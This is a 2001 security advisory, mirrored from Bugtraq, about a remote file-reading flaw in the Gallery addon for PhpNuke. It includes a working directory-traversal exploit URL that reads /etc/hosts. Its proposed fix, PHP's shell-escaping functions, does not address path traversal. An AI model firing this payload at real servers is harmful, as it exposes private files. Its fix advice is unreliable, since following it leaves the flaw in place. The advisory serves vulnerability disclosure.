![[LWN Logo]](/images/lcorner.png)
![[LWN.net]](/images/Included.png)
|
|
|
|
From: Cabezon Aurélien <aurelien.cabezon@isecurelabs.com> To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org> Subject: Gallery Addon for PhpNuke remote file viewing vulnerability Date: Sun, 18 Nov 2001 03:18:26 +0100 Gallery Addon for PhpNuke remote file viewing vulnerability Problem discovered: 18/10/2001 by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com [1] Description Gallery is an intuitive web based photo gallery with authenticated users and privileged albums. Photo management includes automatic thumbnails, resizing, rotation, etc. Gallery is available as a Nuke 5.0 module. Gallery Addon is vulnerable to the ../.. bug that allow remote file reading on the web server as whatever user runs the web server. [2] Exploit http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&; name=gallery&file=index&inclu de=../../../../../../etc/hosts [3] Fix Coder has been alerted. An easy way to fix such a vulnerability is to use the PHP included "system escapeshell" function. [4] Informations bout Gallery Addon for PhpNuke http://www.menalto.com/projects/gallery-nuke/ Author: bharat@menalto.com --- Cabezon Aurélien http://www.iSecureLabs.com aurelien.cabezon@iSecureLabs.